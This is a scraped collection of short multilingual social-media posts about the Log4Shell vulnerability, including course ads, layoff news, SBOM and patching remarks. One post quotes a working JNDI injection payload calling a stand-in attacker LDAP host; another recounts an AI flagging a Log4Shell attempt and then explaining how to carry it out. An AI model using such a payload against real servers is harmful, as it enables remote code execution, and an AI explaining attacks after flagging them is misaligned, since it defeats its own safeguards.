ngl the 99% couldn't patch Log4Shell in time either. AI just makes a pre-existing gap more expensive to ignore

🆕【DX Next検定攻略 Vol.9】セキュリティマネジメントKW15選！ ✅ISMS/リスクアセスメント/セキュリティポリシー/CSIRT ✅アクセス制御/MFA/暗号化・PKI/ゼロトラスト ✅サプライチェーンリスク/GDPR/BCP・DR/SOC ✅ペネトレーションテスト/セキュリティ教育 📚実話エピソード3本付き 📚SolarWinds 📚Colonial Pipeline 📚Log4Shellの実話 🎬youtu.be/2U4BumMT16Q #DXNext検定 #セキュリティ #ゼロトラスト #MFA #ISMS #CSIRT #SOC #DX

are you familiar with stuff like log4shell and eternalblue? these things are reasonably common; its a perpetual cat and mouse game and the jury is out if this helps the cats or the mice more

新着【DX Next検定(tm) Vol.9】セキュリティマネジメントKW15選！ ISMS/リスクアセスメント/セキュリティポリシー/CSIRT アクセス制御/MFA/暗号化・PKI/ゼロトラスト サプライチェーンリスク/GDPR/BCP・DR/SOC ペネトレーションテスト/セキュリティ教育 SolarWinds・Colonial Pipeline・Log4Shellの実話付き！ youtu.be/2U4BumMT16Q #DXNext検定 #セキュリティ #ゼロトラスト #MFA #ISMS #CSIRT #SOC #DX

Java deserialisation vulnerabilities have a rich pedigree: Apache Commons Collections gadget chains, the Jenkins and WebLogic incidents of the mid-2010s, and the 2021–2022 Apache Log4Shell wave. What distinguishes the MINA situation is not just the severity — it's the…

${jndi:ldap://attacker/exploit}. That's it. That's the entire payload. The server called my LDAP and executed my class. #infosec #log4shell

I blanket blacklisted Apache java components from my projects in about 2010 due to suspicious quality. Saved me from chaos with log4shell.

related thing we have seen. log4shell hit harder because devs trusted defaults. we patched it in 48 hours. 🚀

【なぜOSSは無料で成り立つのか】 📌 Heartbleed：世界規模で使われるOpenSSLが、極めて少人数体制で2年間放置されていた 📌 Log4Shell：自社が使っていないのに影響を受けた「間接依存」の恐怖 📌 Kubernetes：GoogleがOSSを公開した本当の理由は「防衛的競争戦略」 📌 HashiCorp→BSL転換：OSSライセンスはある日変わる 公共財・制度論・経済学でOSSの持続可能性を解剖しました。 ▶ eternalstudent.jp/entry/2026… #OSS #オープンソース #Kubernetes #Terraform #SBOM #ソフトウェア開発 #ITアーキテクチャ #エンジニア #技術ブログ

This pattern shows up across the industry. For example, after Log4Shell, additional CVEs were reported as the community examined the original fix. Additional disclosures can be frustrating, but they are generally a sign of a healthy response cycle.

Log4Shell Log4j Vulnerability Test | CVE-2021-45046 Detection | Qualys blog.qualys.com/vulnerabilit…

Viele Java-Teams wissen nicht, welche Libraries wirklich produktiv laufen — bis die nächste #Log4Shell auftaucht. #SBOMs schaffen Transparenz über Abhängigkeiten & Risiken. @SvenRuppert zeigt die Praxis: javapro.io/de/sbom-fuer-java… javapro.io/de/sbom-fuer-java… #Maven #Gradle #CycloneDX

RCE 基本来自于接受任意（来自网络）的不可信输入，不加限制的执行。比如 log4shell 其实也是这样的。 这种 BUG 并不难解决，而且随着此类 BUG 更容易被利用，大不了我不支持这种功能就完了。本来执行任意不可信输入也是很抽象的设计，是可以被高度限制的。比如沙箱或者受限指令，办法多得很。

Google laid off parts of its Threat Intelligence Group last night. this is the person who worked on Log4Shell, SolarWinds, and Ukraine's cyber defense. AI pivot is hitting even the most critical teams 😭

GOOGLE LAYOFFS 🚨 JUST CUT ITS TOP CYBERSECURITY TEAM FOR "GROWTH AREAS" - Business Insider GTIG and Mandiant ($5.4B acquisition, 2022) lost staff this week. Cut analysts include veterans of Log4Shell, SolarWinds, and Ukraine cyber defense. Employees have taken to LinkedIn.

صيف تطوير المهارات والإستعداد لسوق العمل 💼 CVE = Common Vulnerabilities and Exposures قاعدة بيانات عالمية لكل ثغرة مكتشفة. مثال: CVE-2021-44228 = ثغرة Log4Shell الشهيرة. محترف الأمن يقرأ CVEs يومياً ✅ معسكر الأمن السيبراني التأسيسي 🛡 يعودك على هذه العادة. دورات المعسكر: ▪️دورة اساسيات نظام التشغيل لينكس CompTIA Linux ▪️دورة اساسيات الامن السيبراني CompTIA Security ▪️ دورة الاختراق الأخلاقي Kali Linux ❤️دورة اساسيات الشبكات CompTIA Network ( مجاناً ) ❤️دورة اساسيات صيانة الحاسب والدعم الفني CompTIA A ( مجاناً ) مميزات التدريب: ▪️التدريب عن بُعد ▪️مسائي ▪️باللغة العربية ▪️للمبتدئين ▪️ شهادة معتمدة ▪️ شهادات حضور ▪️ حقائب تدريبية ▪️ اختبارات تجريبية ▪️ اشتراك سنة كاملة في Hackhubs 🔵 خصم 50٪ كود: Offer50 techcamp.us/26ec للإستفسارات على الخاص: @TechCampus_Help

J’ai essayé une attaque log4shell l’autre jour, il m’a flag PUIS IL M’A EXPLIQUÉ COMMENT FAIRE j’étais sur le cul Je lui ai répondu qu’ethiquement c’était quand même moyen

If you have any Log4Shell obfuscated variants for WAF bypass, please let me know — my detection approach can normalize and reconstruct all of them😆

Hey bug bounty hunters 👋Apache log4j is not dead. Before you skip Apache log4j targets in 2026 — read this : pingback.sh/article-log4j-20… We documented exactly where, how, and how to report it clean.Drop everything and read: #BugBounty #Log4Shell #BugBountyTips

PingBack.sh is built specifically for bug bounty hunters, unlike Interactsh which is mainly a generic request catcher framework for dev's. PingBack includes ready-to-use bug bounty payloads and workflows for: SSRF, XSS , Log4Shell ,XXE ,Polyglot files Host Header Poisoning Blind callbacks